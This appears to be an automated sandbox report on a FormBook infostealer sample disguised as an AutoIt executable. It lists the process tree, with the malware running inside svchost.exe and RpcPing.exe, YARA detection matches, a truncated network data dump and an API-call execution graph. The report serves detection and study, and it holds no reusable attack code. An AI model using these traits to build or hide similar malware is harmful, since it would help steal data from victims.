5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:07:52:01
                  Start date:02/07/2024
                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
                  Imagebase:0x750000
                  File size:1'208'832 bytes
                  MD5 hash:A6D5020BF8BFE2DC1140A50936EF5EC9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:07:52:02
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
                  Imagebase:0xa30000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:8
                  Start time:07:52:51
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe"
                  Imagebase:0x1e0000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:9
                  Start time:07:52:52
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\RpcPing.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                  Imagebase:0x2d0000
                  File size:26'624 bytes
                  MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:10
                  Start time:07:53:19
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe"
                  Imagebase:0x1e0000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:11
                  Start time:07:53:34
                  Start date:02/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff728280000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:2.9%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:166
                    execution_graph 97850 751055 97855 752649 97850->97855 97865 7577c7 97855->97865 97860 752754 97861 75105a 97860->97861 97873 753416 59 API calls 2 library calls 97860->97873 97862 772f80 97861->97862 97919 772e84 97862->97919 97864 751064 97874 770ff6 97865->97874 97867 7577e8 97868 770ff6 Mailbox 59 API calls 97867->97868 97869 7526b7 97868->97869 97870 753582 97869->97870 97912 7535b0 97870->97912 97873->97860 97876 770ffe 97874->97876 97877 771018 97876->97877 97879 77101c std::exception::exception 97876->97879 97884 77594c 97876->97884 97901 7735e1 DecodePointer 97876->97901 97877->97867 97902 7787db RaiseException 97879->97902 97881 771046 97903 778711 58 API calls _free 97881->97903 97883 771058 97883->97867 97885 7759c7 97884->97885 97897 775958 97884->97897 97910 7735e1 DecodePointer 97885->97910 97887 7759cd 97911 778d68 58 API calls __getptd_noexit 97887->97911 97890 77598b RtlAllocateHeap 97890->97897 97900 7759bf 97890->97900 97892 7759b3 97908 778d68 58 API calls __getptd_noexit 97892->97908 97896 775963 97896->97897 97904 77a3ab 58 API calls __NMSG_WRITE 97896->97904 97905 77a408 58 API calls 6 library calls 97896->97905 97906 7732df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97896->97906 97897->97890 97897->97892 97897->97896 97898 7759b1 97897->97898 97907 7735e1 DecodePointer 97897->97907 97909 778d68 58 API calls __getptd_noexit 97898->97909 97900->97876 97901->97876 97902->97881 97903->97883 97904->97896 97905->97896 97907->97897 97908->97898 97909->97900 97910->97887 97911->97900 97913 7535bd 97912->97913 97914 7535a1 97912->97914 97913->97914 97915 7535c4 RegOpenKeyExW 97913->97915 97914->97860 97915->97914 97916 7535de RegQueryValueExW 97915->97916 97917 753614 RegCloseKey 97916->97917 97918 7535ff 97916->97918 97917->97914 97918->97917 97920 772e90 __ioinit 97919->97920 97927 773457 97920->97927 97926 772eb7 __ioinit 97926->97864 97944 779e4b 97927->97944 97929 772e99 97930 772ec8 DecodePointer DecodePointer 97929->97930 97931 772ea5 97930->97931 97932 772ef5 97930->97932 97941 772ec2 97931->97941 97932->97931 97990 7789e4 59 API calls _memcpy_s 97932->97990 97934 772f58 EncodePointer EncodePointer 97934->97931 97935 772f07 97935->97934 97936 772f2c 97935->97936 97991 778aa4 61 API calls 2 library calls 97935->97991 97936->97931 97940 772f46 EncodePointer 97936->97940 97992 778aa4 61 API calls 2 library calls 97936->97992 97939 772f40 97939->97931 97939->97940 97940->97934 97993 773460 97941->97993 97945 779e6f EnterCriticalSection 97944->97945 97946 779e5c 97944->97946 97945->97929 97951 779ed3 97946->97951 97948 779e62 97948->97945 97975 7732f5 58 API calls 3 library calls 97948->97975 97952 779edf __ioinit 97951->97952 97953 779f00 97952->97953 97954 779ee8 97952->97954 97960 779f21 __ioinit 97953->97960 97979 778a5d 58 API calls 2 library calls 97953->97979 97976 77a3ab 58 API calls __NMSG_WRITE 97954->97976 97956 779eed 97977 77a408 58 API calls 6 library calls 97956->97977 97959 779f15 97962 779f1c 97959->97962 97963 779f2b 97959->97963 97960->97948 97961 779ef4 97978 7732df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97961->97978 97980 778d68 58 API calls __getptd_noexit 97962->97980 97965 779e4b __lock 58 API calls 97963->97965 97967 779f32 97965->97967 97969 779f57 97967->97969 97970 779f3f 97967->97970 97982 772f95 97969->97982 97981 77a06b InitializeCriticalSectionAndSpinCount 97970->97981 97973 779f4b 97988 779f73 LeaveCriticalSection _doexit 97973->97988 97976->97956 97977->97961 97979->97959 97980->97960 97981->97973 97983 772f9e RtlFreeHeap 97982->97983 97987 772fc7 _free 97982->97987 97984 772fb3 97983->97984 97983->97987 97989 778d68 58 API calls __getptd_noexit 97984->97989 97986 772fb9 GetLastError 97986->97987 97987->97973 97988->97960 97989->97986 97990->97935 97991->97936 97992->97939 97996 779fb5 LeaveCriticalSection 97993->97996 97995 772ec7 97995->97926 97996->97995 97997 751066 98002 75f8cf 97997->98002 97999 75106c 98000 772f80 __cinit 67 API calls 97999->98000 98001 751076 98000->98001 98003 75f8f0 98002->98003 98035 770143 98003->98035 98007 75f937 98008 7577c7 59 API calls 98007->98008 98009 75f941 98008->98009 98010 7577c7 59 API calls 98009->98010 98011 75f94b 98010->98011 98012 7577c7 59 API calls 98011->98012 98013 75f955 98012->98013 98014 7577c7 59 API calls 98013->98014 98015 75f993 98014->98015 98016 7577c7 59 API calls 98015->98016 98017 75fa5e 98016->98017 98045 7660e7 98017->98045 98021 75fa90 98022 7577c7 59 API calls 98021->98022 98023 75fa9a 98022->98023 98073 76ffde 98023->98073 98025 75fae1 98026 75faf1 GetStdHandle 98025->98026 98027 75fb3d 98026->98027 98028 7949d5 98026->98028 98029 75fb45 OleInitialize 98027->98029 98028->98027 98030 7949de 98028->98030 98029->97999 98080 7b6dda 64 API calls Mailbox 98030->98080 98032 7949e5 98081 7b74a9 CreateThread 98032->98081 98034 7949f1 CloseHandle 98034->98029 98082 77021c 98035->98082 98038 77021c 59 API calls 98039 770185 98038->98039 98040 7577c7 59 API calls 98039->98040 98041 770191 98040->98041 98089 757d2c 98041->98089 98043 75f8f6 98044 7703a2 6 API calls 98043->98044 98044->98007 98046 7577c7 59 API calls 98045->98046 98047 7660f7 98046->98047 98048 7577c7 59 API calls 98047->98048 98049 7660ff 98048->98049 98113 765bfd 98049->98113 98052 765bfd 59 API calls 98053 76610f 98052->98053 98054 7577c7 59 API calls 98053->98054 98055 76611a 98054->98055 98056 770ff6 Mailbox 59 API calls 98055->98056 98057 75fa68 98056->98057 98058 766259 98057->98058 98059 766267 98058->98059 98060 7577c7 59 API calls 98059->98060 98061 766272 98060->98061 98062 7577c7 59 API calls 98061->98062 98063 76627d 98062->98063 98064 7577c7 59 API calls 98063->98064 98065 766288 98064->98065 98066 7577c7 59 API calls 98065->98066 98067 766293 98066->98067 98068 765bfd 59 API calls 98067->98068 98069 76629e 98068->98069 98070 770ff6 Mailbox 59 API calls 98069->98070 98071 7662a5 RegisterWindowMessageW 98070->98071 98071->98021 98074 76ffee 98073->98074 98075 7a5cc3 98073->98075 98076 770ff6 Mailbox 59 API calls 98074->98076 98116 7b9d71 60 API calls 98075->98116 98079 76fff6 98076->98079 98078 7a5cce 98079->98025 98080->98032 98081->98034 98117 7b748f 65 API calls 98081->98117 98083 7577c7 59 API calls 98082->98083 98084 770227 98083->98084 98085 7577c7 59 API calls 98084->98085 98086 77022f 98085->98086 98087 7577c7 59 API calls 98086->98087 98088 77017b 98087->98088 98088->98038 98090 757da5 98089->98090 98091 757d38 __wsetenvp 98089->98091 98105 757e8c 98090->98105 98093 757d73 98091->98093 98094 757d4e 98091->98094 98102 758189 98093->98102 98098 758087 98094->98098 98097 757d56 _memmove 98097->98043 98099 75809f 98098->98099 98101 758099 98098->98101 98100 770ff6 Mailbox 59 API calls 98099->98100 98100->98101 98101->98097 98103 770ff6 Mailbox 59 API calls 98102->98103 98104 758193 98103->98104 98104->98097 98106 757e9a 98105->98106 98108 757ea3 _memmove 98105->98108 98106->98108 98109 757faf 98106->98109 98108->98097 98110 757fc2 98109->98110 98112 757fbf _memmove 98109->98112 98111 770ff6 Mailbox 59 API calls 98110->98111 98111->98112 98112->98108 98114 7577c7 59 API calls 98113->98114 98115 765c05 98114->98115 98115->98052 98116->98078 98118 751016 98123 754ad2 98118->98123 98121 772f80 __cinit 67 API calls 98122 751025 98121->98122 98124 770ff6 Mailbox 59 API calls 98123->98124 98125 754ada 98124->98125 98127 75101b 98125->98127 98130 754a94 98125->98130 98127->98121 98131 754a9d 98130->98131 98133 754aaf 98130->98133 98132 772f80 __cinit 67 API calls 98131->98132 98132->98133 98134 754afe 98133->98134 98135 7577c7 59 API calls 98134->98135 98136 754b16 GetVersionExW 98135->98136 98137 757d2c 59 API calls 98136->98137 98138 754b59 98137->98138 98139 757e8c 59 API calls 98138->98139 98147 754b86 98138->98147 98140 754b7a 98139->98140 98162 757886 98140->98162 98142 754bf1 GetCurrentProcess IsWow64Process 98143 754c0a 98142->98143 98144 754c20 98143->98144 98145 754c89 GetSystemInfo 98143->98145 98158 754c95 98144->98158 98149 754c56 98145->98149 98146 78dc8d 98147->98142 98147->98146 98149->98127 98151 754c32 98153 754c95 2 API calls 98151->98153 98152 754c7d GetSystemInfo 98154 754c47 98152->98154 98155 754c3a GetNativeSystemInfo 98153->98155 98154->98149 98156 754c4d FreeLibrary 98154->98156 98155->98154 98156->98149 98159 754c2e 98158->98159 98160 754c9e LoadLibraryA 98158->98160 98159->98151 98159->98152 98160->98159 98161 754caf GetProcAddress 98160->98161 98161->98159 98163 757894 98162->98163 98164 757e8c 59 API calls 98163->98164 98165 7578a4 98164->98165 98165->98147 98166 777e93 98167 777e9f __ioinit 98166->98167 98203 77a048 GetStartupInfoW 98167->98203 98169 777ea4 98205 778dbc GetProcessHeap 98169->98205 98171 777efc 98172 777f07 98171->98172 98288 777fe3 58 API calls 3 library calls 98171->98288 98206 779d26 98172->98206 98175 777f0d 98176 777f18 __RTC_Initialize 98175->98176 98289 777fe3 58 API calls 3 library calls 98175->98289 98227 77d812 98176->98227 98179 777f27 98180 777f33 GetCommandLineW 98179->98180 98290 777fe3 58 API calls 3 library calls 98179->98290 98246 785173 GetEnvironmentStringsW 98180->98246 98183 777f32 98183->98180 98186 777f4d 98187 777f58 98186->98187 98291 7732f5 58 API calls 3 library calls 98186->98291 98256 784fa8 98187->98256 98190 777f5e 98191 777f69 98190->98191 98292 7732f5 58 API calls 3 library calls 98190->98292 98270 77332f 98191->98270 98194 777f71 98195 777f7c __wwincmdln 98194->98195 98293 7732f5 58 API calls 3 library calls 98194->98293 98276 75492e 98195->98276 98198 777f9f 98295 773320 58 API calls _doexit 98198->98295 98199 777f90 98199->98198 98294 773598 58 API calls _doexit 98199->98294 98202 777fa4 __ioinit 98204 77a05e 98203->98204 98204->98169 98205->98171 98296 7733c7 36 API calls 2 library calls 98206->98296 98208 779d2b 98297 779f7c InitializeCriticalSectionAndSpinCount __ioinit 98208->98297 98210 779d34 98298 779d9c 61 API calls 2 library calls 98210->98298 98211 779d30 98211->98210 98299 779fca TlsAlloc 98211->98299 98214 779d39 98214->98175 98215 779d46 98215->98210 98216 779d51 98215->98216 98300 778a15 98216->98300 98219 779d93 98308 779d9c 61 API calls 2 library calls 98219->98308 98222 779d98 98222->98175 98223 779d72 98223->98219 98224 779d78 98223->98224 98307 779c73 58 API calls 4 library calls 98224->98307 98226 779d80 GetCurrentThreadId 98226->98175 98228 77d81e __ioinit 98227->98228 98229 779e4b __lock 58 API calls 98228->98229 98230 77d825 98229->98230 98231 778a15 __calloc_crt 58 API calls 98230->98231 98233 77d836 98231->98233 98232 77d8a1 GetStartupInfoW 98240 77d8b6 98232->98240 98241 77d9e5 98232->98241 98233->98232 98234 77d841 __ioinit @_EH4_CallFilterFunc@8 98233->98234 98234->98179 98235 77daad 98322 77dabd LeaveCriticalSection _doexit 98235->98322 98237 778a15 __calloc_crt 58 API calls 98237->98240 98238 77da32 GetStdHandle 98238->98241 98239 77da45 GetFileType 98239->98241 98240->98237 98240->98241 98242 77d904 98240->98242 98241->98235 98241->98238 98241->98239 98321 77a06b InitializeCriticalSectionAndSpinCount 98241->98321 98242->98241 98243 77d938 GetFileType 98242->98243 98320 77a06b InitializeCriticalSectionAndSpinCount 98242->98320 98243->98242 98247 777f43 98246->98247 98248 785184 98246->98248 98252 784d6b GetModuleFileNameW 98247->98252 98323 778a5d 58 API calls 2 library calls 98248->98323 98250 7851aa _memmove 98251 7851c0 FreeEnvironmentStringsW 98250->98251 98251->98247 98253 784d9f _wparse_cmdline 98252->98253 98255 784ddf _wparse_cmdline 98253->98255 98324 778a5d 58 API calls 2 library calls 98253->98324 98255->98186 98257 784fb9 98256->98257 98258 784fc1 __wsetenvp 98256->98258 98257->98190 98259 778a15 __calloc_crt 58 API calls 98258->98259 98262 784fea __wsetenvp 98259->98262 98260 785041 98261 772f95 _free 58 API calls 98260->98261 98261->98257 98262->98257 98262->98260 98263 778a15 __calloc_crt 58 API calls 98262->98263 98264 785066 98262->98264 98267 78507d 98262->98267 98325 784857 58 API calls _memcpy_s 98262->98325 98263->98262 98265 772f95 _free 58 API calls 98264->98265 98265->98257 98326 779006 IsProcessorFeaturePresent 98267->98326 98269 785089 98269->98190 98272 77333b __IsNonwritableInCurrentImage 98270->98272 98349 77a711 98272->98349 98273 773359 __initterm_e 98274 772f80 __cinit 67 API calls 98273->98274 98275 773378 _doexit __IsNonwritableInCurrentImage 98273->98275 98274->98275 98275->98194 98277 754948 98276->98277 98287 7549e7 98276->98287 98278 754982 IsThemeActive 98277->98278 98352 7735ac 98278->98352 98282 7549ae 98364 754a5b SystemParametersInfoW SystemParametersInfoW 98282->98364 98284 7549ba 98365 753b4c 98284->98365 98286 7549c2 SystemParametersInfoW 98286->98287 98287->98199 98288->98172 98289->98176 98290->98183 98294->98198 98295->98202 98296->98208 98297->98211 98298->98214 98299->98215 98303 778a1c 98300->98303 98302 778a57 98302->98219 98306 77a026 TlsSetValue 98302->98306 98303->98302 98305 778a3a 98303->98305 98309 785446 98303->98309 98305->98302 98305->98303 98317 77a372 Sleep 98305->98317 98306->98223 98307->98226 98308->98222 98310 785451 98309->98310 98315 78546c 98309->98315 98311 78545d 98310->98311 98310->98315 98318 778d68 58 API calls __getptd_noexit 98311->98318 98313 78547c RtlAllocateHeap 98314 785462 98313->98314 98313->98315 98314->98303 98315->98313 98315->98314 98319 7735e1 DecodePointer 98315->98319 98317->98305 98318->98314 98319->98315 98320->98242 98321->98241 98322->98234 98323->98250 98324->98255 98325->98262 98327 779011 98326->98327 98332 778e99 98327->98332 98331 77902c 98331->98269 98333 778eb3 _memset ___raise_securityfailure 98332->98333 98334 778ed3 IsDebuggerPresent 98333->98334 98340 77a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98334->98340 98337 778f97 ___raise_securityfailure 98341 77c836 98337->98341 98338 778fba 98339 77a380 GetCurrentProcess TerminateProcess 98338->98339 98339->98331 98340->98337 98342 77c840 IsProcessorFeaturePresent 98341->98342 98343 77c83e 98341->98343 98345 785b5a 98342->98345 98343->98338 98348 785b09 5 API calls ___raise_securityfailure 98345->98348 98347 785c3d 98347->98338 98348->98347 98350 77a714 EncodePointer 98349->98350 98350->98350 98351 77a72e 98350->98351 98351->98273 98353 779e4b __lock 58 API calls 98352->98353 98354 7735b7 DecodePointer EncodePointer 98353->98354 98417 779fb5 LeaveCriticalSection 98354->98417 98356 7549a7 98357 773614 98356->98357 98358 77361e 98357->98358 98359 773638 98357->98359 98358->98359 98418 778d68 58 API calls __getptd_noexit 98358->98418 98359->98282 98361 773628 98419 778ff6 9 API calls _memcpy_s 98361->98419 98363 773633 98363->98282 98364->98284 98366 753b59 __write_nolock 98365->98366 98367 7577c7 59 API calls 98366->98367 98368 753b63 GetCurrentDirectoryW 98367->98368 98420 753778 98368->98420 98370 753b8c IsDebuggerPresent 98371 78d4ad MessageBoxA 98370->98371 98372 753b9a 98370->98372 98374 78d4c7 98371->98374 98372->98374 98375 753bb7 98372->98375 98404 753c73 98372->98404 98373 753c7a SetCurrentDirectoryW 98378 753c87 Mailbox 98373->98378 98630 757373 59 API calls Mailbox 98374->98630 98501 7573e5 98375->98501 98378->98286 98379 78d4d7 98384 78d4ed SetCurrentDirectoryW 98379->98384 98381 753bd5 GetFullPathNameW 98382 757d2c 59 API calls 98381->98382 98383 753c10 98382->98383 98517 760a8d 98383->98517 98384->98378 98387 753c2e 98388 753c38 98387->98388 98631 7b4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98387->98631 98533 753a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98388->98533 98392 78d50a 98392->98388 98394 78d51b 98392->98394 98632 754864 98394->98632 98395 753c42 98397 753c55 98395->98397 98541 7543db 98395->98541 98552 760b30 98397->98552 98398 78d523 98404->98373 98417->98356 98418->98361 98419->98363 98421 7577c7 59 API calls 98420->98421 98422 75378e 98421->98422 98659 753d43 98422->98659 98424 7537ac 98425 754864 61 API calls 98424->98425 98426 7537c0 98425->98426 98427 757f41 59 API calls 98426->98427 98428 7537cd 98427->98428 98673 754f3d 98428->98673 98431 78d3ae 98744 7b97e5 98431->98744 98432 7537ee Mailbox 98697 7581a7 98432->98697 98435 78d3cd 98438 772f95 _free 58 API calls 98435->98438 98440 78d3da 98438->98440 98443 754faa 84 API calls 98440->98443 98444 78d3e3 98443->98444 98448 753ee2 59 API calls 98444->98448 98445 757f41 59 API calls 98446 75381a 98445->98446 98704 758620 98446->98704 98450 78d3fe 98448->98450 98449 75382c Mailbox 98451 757f41 59 API calls 98449->98451 98452 753ee2 59 API calls 98450->98452 98453 753852 98451->98453 98454 78d41a 98452->98454 98455 758620 69 API calls 98453->98455 98456 754864 61 API calls 98454->98456 98458 753861 Mailbox 98455->98458 98457 78d43f 98456->98457 98459 753ee2 59 API calls 98457->98459 98461 7577c7 59 API calls 98458->98461 98460 78d44b 98459->98460 98463 7581a7 59 API calls 98460->98463 98462 75387f 98461->98462 98708 753ee2 98462->98708 98464 78d459 98463->98464 98466 753ee2 59 API calls 98464->98466 98468 78d468 98466->98468 98474 7581a7 59 API calls 98468->98474 98470 753899 98470->98444 98471 7538a3 98470->98471 98472 77313d _W_store_winword 60 API calls 98471->98472 98473 7538ae 98472->98473 98473->98450 98475 7538b8 98473->98475 98476 78d48a 98474->98476 98477 77313d _W_store_winword 60 API calls 98475->98477 98478 753ee2 59 API calls 98476->98478 98479 7538c3 98477->98479 98480 78d497 98478->98480 98479->98454 98481 7538cd 98479->98481 98480->98480 98482 77313d _W_store_winword 60 API calls 98481->98482 98483 7538d8 98482->98483 98483->98468 98484 753919 98483->98484 98486 753ee2 59 API calls 98483->98486 98484->98468 98485 753926 98484->98485 98724 75942e 98485->98724 98487 7538fc 98486->98487 98489 7581a7 59 API calls 98487->98489 98491 75390a 98489->98491 98493 753ee2 59 API calls 98491->98493 98493->98484 98496 7593ea 59 API calls 98498 753961 98496->98498 98497 759040 60 API calls 98497->98498 98498->98496 98498->98497 98499 753ee2 59 API calls 98498->98499 98500 7539a7 Mailbox 98498->98500 98499->98498 98500->98370 98502 7573f2 __write_nolock 98501->98502 98503 78ee4b _memset 98502->98503 98504 75740b 98502->98504 98507 78ee67 GetOpenFileNameW 98503->98507 99538 7548ae 98504->99538 98509 78eeb6 98507->98509 98510 757d2c 59 API calls 98509->98510 98512 78eecb 98510->98512 98512->98512 98514 757429 99566 7569ca 98514->99566 98518 760a9a __write_nolock 98517->98518 99882 756ee0 98518->99882 98520 760a9f 98532 753c26 98520->98532 99893 7612fe 89 API calls 98520->99893 98522 760aac 98522->98532 99894 764047 91 API calls Mailbox 98522->99894 98524 760ab5 98525 760ab9 GetFullPathNameW 98524->98525 98524->98532 98526 757d2c 59 API calls 98525->98526 98527 760ae5 98526->98527 98528 757d2c 59 API calls 98527->98528 98529 760af2 98528->98529 98530 7950d5 _wcscat 98529->98530 98531 757d2c 59 API calls 98529->98531 98531->98532 98532->98379 98532->98387 98534 78d49c 98533->98534 98535 753ac2 LoadImageW RegisterClassExW 98533->98535 99934 7548fe LoadImageW EnumResourceNamesW 98534->99934 99933 753041 7 API calls 98535->99933 98538 78d4a5 98539 753b46 98540 7539e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98539->98540 98540->98395 98542 754406 _memset 98541->98542 99935 754213 98542->99935 98548 75448b 98553 7950ed 98552->98553 98565 760b55 98552->98565 100024 7ba0b5 89 API calls 4 library calls 98553->100024 98561 760bab PeekMessageW 98592 760b65 Mailbox 98561->98592 98565->98592 100025 759fbd 60 API calls 98565->100025 100026 7a68bf 341 API calls 98565->100026 98566 7952ab Sleep 98566->98592 98571 760fa3 PeekMessageW 98571->98592 98572 760fbf TranslateMessage DispatchMessageW 98572->98571 98573 79517a TranslateAcceleratorW 98573->98571 98573->98592 98574 795c49 WaitForSingleObject 98574->98592 98576 760e73 timeGetTime 98576->98592 98577 760fdd Sleep 98578 7581a7 59 API calls 98578->98592 98592->98561 98592->98566 98592->98571 98592->98572 98592->98573 98592->98574 98592->98576 98592->98577 98592->98578 98624 7959ff VariantClear 98592->98624 98625 795a95 VariantClear 98592->98625 98626 758e34 59 API calls Mailbox 98592->98626 98627 795843 VariantClear 98592->98627 98628 7a7405 59 API calls 98592->98628 98624->98592 98625->98592 98626->98592 98627->98592 98628->98592 98630->98379 98631->98392 98633 781b90 __write_nolock 98632->98633 98634 754871 GetModuleFileNameW 98633->98634 98635 757f41 59 API calls 98634->98635 98636 754897 98635->98636 98637 7548ae 60 API calls 98636->98637 98638 7548a1 Mailbox 98637->98638 98638->98398 98660 753d50 __write_nolock 98659->98660 98661 757d2c 59 API calls 98660->98661 98671 753eb6 Mailbox 98660->98671 98663 753d82 98661->98663 98666 753db8 Mailbox 98663->98666 98785 757b52 98663->98785 98664 757b52 59 API calls 98664->98666 98665 753e89 98667 757f41 59 API calls 98665->98667 98665->98671 98666->98664 98666->98665 98668 757f41 59 API calls 98666->98668 98666->98671 98788 753f84 98666->98788 98669 753eaa 98667->98669 98668->98666 98670 753f84 59 API calls 98669->98670 98670->98671 98671->98424 98794 754d13 98673->98794 98678 78dd0f 98680 754faa 84 API calls 98678->98680 98679 754f68 LoadLibraryExW 98804 754cc8 98679->98804 98683 78dd16 98680->98683 98685 754cc8 3 API calls 98683->98685 98687 78dd1e 98685->98687 98686 754f8f 98686->98687 98688 754f9b 98686->98688 98830 75506b 98687->98830 98689 754faa 84 API calls 98688->98689 98691 7537e6 98689->98691 98691->98431 98691->98432 98694 78dd45 98838 755027 98694->98838 98696 78dd52 98698 7581b2 98697->98698 98699 753801 98697->98699 99268 7580d7 98698->99268 98701 7593ea 98699->98701 98702 770ff6 Mailbox 59 API calls 98701->98702 98703 75380d 98702->98703 98703->98445 98705 75862b 98704->98705 98707 758652 98705->98707 99272 758b13 69 API calls Mailbox 98705->99272 98707->98449 98709 753f05 98708->98709 98710 753eec 98708->98710 98712 757d2c 59 API calls 98709->98712 98711 7581a7 59 API calls 98710->98711 98713 75388b 98711->98713 98712->98713 98714 77313d 98713->98714 98715 7731be 98714->98715 98716 773149 98714->98716 99275 7731d0 60 API calls 3 library calls 98715->99275 98723 77316e 98716->98723 99273 